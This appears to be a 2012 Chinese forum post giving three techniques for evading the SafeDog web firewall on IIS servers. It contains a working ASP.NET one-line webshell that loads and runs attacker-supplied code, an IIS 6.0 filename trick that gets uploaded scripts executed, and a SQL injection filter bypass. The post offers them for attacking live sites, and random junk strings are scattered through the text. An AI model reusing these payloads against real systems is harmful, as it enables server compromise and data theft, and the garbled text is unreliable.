1、绕过IIS安全狗的一句话。! {; A& a) t/ \
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
+ I5 {/ x% c0 b8 S" ~& v<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
/ h: c" }/ H: ^6 t" Q0 o3 @! g% I) M, z+ D$ d
2、IIS6.0解析漏洞遇到安全狗。
! s* a& F) O+ i文件名为$ V$ T, J3 y% x N+ L; q* K% D
http://www.xxxxx.com/sh3llc0de.asp;1.jpg: s8 Q3 B, V* F3 y
. t7 N4 r0 k) \9 u; N这样的会被IIS安全狗果断屏蔽。
9 p) M) n# r5 {5 n+ g, C! t改成如下名称,IIS6一样会解析:
( D. e/ X) D: s9 t" ^# Awww.xxxxx.com/;1.asp;1.jpg
0 [2 a& X1 i8 f$ z% R/ ^: K
8 m [$ }$ g1 \, T1 n3、安全狗的注入绕过。, j6 ~! y4 c, F0 }0 l& j: C
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
2 |* ?) {; ^4 N但如果:% @" l6 _5 B! a
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
; d& Y V% @& S- `9 ?$ k9 Y就可以成功绕过了。
# E* H1 @6 D; P2 }1 e! y0 o: Z2 n( T
* `, @% F/ v# X
2 {# d. L# g4 u# T/ z% S) M1 L |
发表于 2012-10-31 08:25:30
收藏
支持
反对